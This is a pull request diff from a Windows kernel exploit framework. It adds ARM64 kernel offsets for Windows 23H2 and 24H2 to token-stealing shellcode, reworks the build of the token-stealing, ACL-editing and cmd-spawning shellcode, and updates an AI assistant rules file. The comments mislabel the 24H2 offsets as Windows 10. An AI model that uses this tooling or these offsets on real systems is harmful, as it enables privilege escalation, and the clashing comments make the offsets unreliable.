### PR TITLE
feat: implement token stealing shellcode for ARM64 for Windows 11 23H2

### DIFF
--- a/.cursorrules
+++ b/.cursorrules
@@ -1,7 +1,22 @@
+# WIN-KEXP
 
-You are an expert in Windows kernel programming, Rust, and assembly programming.
+Every time you choose to apply a rule(s), explicitly state the rule(s) in the output. You can abbreviate the rule description to a single word or phrase.
 
-Key Principles
+## Project Description
+
+This project is a Windows kernel exploit development framework. It provides a set of tools and libraries for developing and testing Windows kernel exploits.
+
+## Tech Stack
+
+- Rust
+- Assembly using MASM syntax
+
+## Assembly Programming
+- Use MASM syntax for assembly programming on X86_64 architecture.
+- Use ARMASM syntax for assembly programming on ARM64 architecture.
+- Use MASM directives for defining sections, equates, and macros.
+
+## Rust
 - Write clear, concise, and idiomatic Rust code with accurate examples.
 - Prioritize modularity, clean code organization, and efficient resource management.
 - Use expressive variable names that convey intent (e.g., `is_ready`, `has_data`).
@@ -9,20 +24,35 @@ Key Principles
 - Avoid code duplication; use functions and modules to encapsulate reusable logic.
 - Write code with safety, concurrency, and performance in mind, embracing Rust's ownership and type system.
 
-Windows Kernel Programming
+## Error Handling
+- Embrace Rust's Result and Option types for error handling.
+- Implement custom error types using `thiserror` for more descriptive errors.
+- Handle errors and edge cases early, returning errors where appropriate.
+
+## Windows Kernel Programming
 - Use Windows API functions and structures for kernel programming.
 - Use windows-rs crate for Windows API bindings.
 - Use @Web https://microsoft.github.io/windows-docs-rs/doc/windows/ for Windows API documentation.
 - When using windows-rs, use the `windows` module for Windows API bindings.
 - When using windows-rs, declare the relevant functions and structures and add the necessary imports.
 
-Assembly Programming
-- Use MASM syntax for assembly programming on X86_64 architecture.
-- Use ARMASM syntax for assembly programming on ARM64 architecture.
-- Use MASM directives for defining sections, equates, and macros.
-- Use MASM instructions for defining the program's logic.
+## Git Usage
 
-Error Handling and Safety
-- Embrace Rust's Result and Option types for error handling.
-- Implement custom error types using `thiserror` or `anyhow` for more descriptive errors.
-- Handle errors and edge cases early, returning errors where appropriate.
+### Commit Message Prefixes:
+
+- "fix:" for bug fixes
+- "feat:" for new features
+- "perf:" for performance improvements
+- "docs:" for documentation changes
+- "style:" for formatting changes
+- "refactor:" for code refactoring
+- "test:" for adding missing tests
+- "chore:" for maintenance tasks
+
+### Rules:
+
+- Use lowercase for commit messages
+- Keep the summary line concise
+- Include description for non-obvious changes
+- Reference issue numbers when applicable
+

--- a/build.rs
+++ b/build.rs
@@ -35,6 +35,17 @@ fn main() {
 
 #[cfg(target_os = "windows")]
 fn compile_asm_files() {
+    let windows_version_original = std::env::var("WINDOWS_VERSION").unwrap_or_else(|_| "24H2".to_string());
+    let windows_version = windows_version_original.trim();
+
+    let out_dir = std::env::var("OUT_DIR").expect("OUT_DIR not set");
+
+    if cfg!(target_arch = "aarch64") && !["23H2", "24H2"].contains(&windows_version) {
+        eprintln!("[-] Invalid Windows version: {}. Must be either 23H2 or 24H2", windows_version);
+        println!("cargo:rustc-cfg=feature=\"shellcode_fallback\"");
+        return;
+    }
+
     #[cfg(target_arch = "x86_64")]
     let asm_files = [
         "src/asm/token_stealing.asm",
@@ -59,19 +70,37 @@ fn compile_asm_files() {
 
     #[cfg(target_arch = "x86_64")]
     {
-        compile_asm_x64("src/asm/token_stealing.asm", "src/asm/token_stealing.obj");
-        compile_asm_x64("src/asm/acl_edit.asm", "src/asm/acl_edit.obj");
-        compile_asm_x64("src/asm/spawn_cmd.asm", "src/asm/spawn_cmd.obj");
+        compile_asm_x64(
+            "src/asm/token_stealing.asm",
+            &format!("{}/token_stealing.obj", out_dir)
+        );
+        compile_asm_x64(
+            "src/asm/acl_edit.asm",
+            &format!("{}/acl_edit.obj", out_dir)
+        );
+        compile_asm_x64(
+            "src/asm/spawn_cmd.asm",
+            &format!("{}/spawn_cmd.obj", out_dir)
+        );
     }
 
     #[cfg(target_arch = "aarch64")]
     {
         compile_asm_arm64(
             "src/asm/token_stealing_arm64.asm",
-            "src/asm/token_stealing.obj",
+            &format!("{}/token_stealing.obj", out_dir),
+            &windows_version,
         );
-        compile_asm_arm64("src/asm/acl_edit_arm64.asm", "src/asm/acl_edit.obj");
-        compile_asm_arm64("src/asm/spawn_cmd_arm64.asm", "src/asm/spawn_cmd.obj");
+        compile_asm_arm64(
+            "src/asm/acl_edit_arm64.asm",
+            &format!("{}/acl_edit.obj", out_dir),
+            &windows_version,
+        );
+        compile_asm_arm64(
+            "src/asm/spawn_cmd_arm64.asm",
+            &format!("{}/spawn_cmd.obj", out_dir),
+            &windows_version,
+        );
     }
 }
 
@@ -107,12 +136,14 @@ fn compile_asm_x64(asm_file: &str, obj_file: &str) {
 
 #[cfg(target_os = "windows")]
 #[cfg(target_arch = "aarch64")]
-fn compile_asm_arm64(asm_file: &str, obj_file: &str) {
-    println!("[*] Starting to compile ARM64: {}", asm_file);
+fn compile_asm_arm64(asm_file: &str, obj_file: &str, windows_version: &str) {
+    println!("[*] Starting to compile ARM64: {} (Windows {})", asm_file, windows_version);
 
     let status = Command::new("armasm64")
         .arg(asm_file)
         .arg(obj_file)
+        .arg("-pd")
+        .arg(format!("WINDOWS_VERSION SETS \"{}\"", windows_version))
         .env("PATH", std::env::var("PATH").unwrap())
         .output();
 

--- a/src/asm/token_stealing_arm64.asm
+++ b/src/asm/token_stealing_arm64.asm
@@ -1,9 +1,21 @@
-; Constants for Windows kernel offsets
+; Version-specific offsets
+    IF WINDOWS_VERSION == "24H2"
+; Windows 10 offsets
 KTHREAD_OFFSET     EQU 0x988    ; Offset to current KTHREAD
 EPROCESS_OFFSET    EQU 0x0B0    ; Offset to EPROCESS
 ACTIVEPROCESSLINKS EQU 0x1C8    ; Offset to ActiveProcessLinks
 PID_OFFSET         EQU 0x1C0    ; Offset to process ID
 TOKEN_OFFSET       EQU 0x238    ; Offset to process token
+    ELIF WINDOWS_VERSION == "23H2"
+; Windows 11 offsets
+KTHREAD_OFFSET     EQU 0x988    ; Offset to current KTHREAD
+EPROCESS_OFFSET    EQU 0x0B0    ; Offset to EPROCESS
+ACTIVEPROCESSLINKS EQU 0x400    ; Offset to ActiveProcessLinks
+PID_OFFSET         EQU 0x3F8    ; Offset to process ID
+TOKEN_OFFSET       EQU 0x470    ; Offset to process token
+    ELSE
+    ERROR "WINDOWS_VERSION not defined or unsupported"
+    ENDIF
 
     AREA |.text|,CODE,READONLY
     ALIGN

--- a/src/shellcode.rs
+++ b/src/shellcode.rs
@@ -248,7 +248,7 @@ fn extract_shellcode_from_obj(shellcode_obj: &[u8]) -> Vec<u8> {
 
 #[cfg(all(target_os = "windows", not(feature = "shellcode_fallback")))]
 pub fn token_stealing_shellcode() -> Vec<u8> {
-    let shellcode_obj = include_bytes!("asm/token_stealing.obj");
+    let shellcode_obj = include_bytes!(concat!(env!("OUT_DIR"), "/token_stealing.obj"));
     extract_shellcode_from_obj(shellcode_obj)
 }
 
@@ -272,7 +272,7 @@ pub fn token_stealing_shellcode() -> Vec<u8> {
 
 #[cfg(all(target_os = "windows", not(feature = "shellcode_fallback")))]
 pub fn acl_edit_shellcode() -> Vec<u8> {
-    let shellcode_obj = include_bytes!("asm/acl_edit.obj");
+    let shellcode_obj = include_bytes!(concat!(env!("OUT_DIR"), "/acl_edit.obj"));
     extract_shellcode_from_obj(shellcode_obj)
 }
 
@@ -283,7 +283,7 @@ pub fn acl_edit_shellcode() -> Vec<u8> {
 
 #[cfg(all(target_os = "windows", not(feature = "shellcode_fallback")))]
 pub fn spawn_cmd_shellcode() -> Vec<u8> {
-    let shellcode_obj = include_bytes!("asm/spawn_cmd.obj");
+    let shellcode_obj = include_bytes!(concat!(env!("OUT_DIR"), "/spawn_cmd.obj"));
     extract_shellcode_from_obj(shellcode_obj)
 }
 


### PR DESCRIPTION
- Update build system to handle both 23H2 and 24H2 ARM64 assembly
- Make cargo build assembly *.obj files in OUT_DIR